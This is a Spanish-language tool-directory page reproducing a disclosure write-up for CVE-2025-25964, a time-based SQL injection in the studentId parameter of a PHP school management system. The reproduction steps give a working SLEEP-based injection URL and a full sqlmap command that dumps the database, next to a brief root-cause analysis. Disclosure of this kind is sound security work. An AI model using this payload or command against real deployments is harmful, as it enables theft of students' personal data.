Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-25964 — Una vulnerabilidad crítica de inyección SQL (CVE-2025-25964) descubierta en el Sistema de Gestión de Información Escolar v1.0 | Kitploit
Herramientas/GitHubGitHub/sudo-sakib/cve-2025-25964
Análisis de VulnerabilidadesExplotación de Aplicaciones WebPruebas de PenetraciónPapers e InvestigaciónAprendizaje y EducaciónSeguridad de Bases de Datos
GitHubsudo-sakib/cve-2025-25964

CVE-2025-25964

Una vulnerabilidad crítica de inyección SQL (CVE-2025-25964) descubierta en el Sistema de Gestión de Información Escolar v1.0

Ver Repositorio
22hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-25964: Inyección SQL en School Information Management System v1.0

Introducción

En el panorama digital actual, la inyección SQL (SQLi) sigue siendo una de las vulnerabilidades más comunes y peligrosas encontradas en aplicaciones web. Esta publicación de blog analiza una vulnerabilidad crítica de inyección SQL (CVE-2025-25964) descubierta en School Information Management System v1.0, desarrollado por Itsourcecode. Esta vulnerabilidad permite a atacantes remotos explotar el sistema, lo que conduce a una posible divulgación de información sensible.

Resumen de la Vulnerabilidad

ID de CVE: CVE-2025-25964

Tipo de Vulnerabilidad: Inyección SQL (SQLi)

Producto Afectado: Student Information Management System - v1.0

Componente Afectado: parámetro studentId en /columbans/admin/modules/student/index.php

Tipo de Ataque: Remoto

Severidad: Alta

Descubridor: Sakib Shaikh

Pasos para Reproducir

Para demostrar el impacto, siga estas instrucciones paso a paso:

  1. Configurar la aplicación vulnerable: Instale y configure School Information Management System v1.0 en un servidor local.

  2. Iniciar sesión: Inicie sesión con las credenciales proporcionadas por Itsourcecode.

  3. Acceder al endpoint vulnerable:

http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207

  1. Inyectar una carga útil SQL para probar la inyección SQL:

http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))zKnT)

  1. Observar la respuesta de la aplicación: Si la página tarda más de 10 segundos en cargar, la vulnerabilidad de inyección SQL está confirmada. Esto demuestra que la base de datos de backend está ejecutando la consulta SQL inyectada.

  2. Usar SQLMap para explotación automatizada:

root@kitploit:~
python sqlmap.py -u "http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207" \
--cookie="PHPSESSID=your_cookie_here" --risk 3 --level 3 --dbs --technique=T --dump --no-cast

Este comando intenta extraer nombres de bases de datos, tablas e información sensible del sistema.

Análisis de Causa Raíz

El problema surge debido a una desinfección de entrada inadecuada en el parámetro studentId del archivo index.php. Cuando un atacante modifica el parámetro studentId con cargas útiles SQL maliciosas, la aplicación procesa la entrada sin una validación adecuada, lo que conduce a una inyección SQL.

Referencias

https://itsourcecode.com/free-projects/php-project/st-columban-student-information-management-system/

https://owasp.org/www-community/attacks/SQL_Injection

Descargar herramienta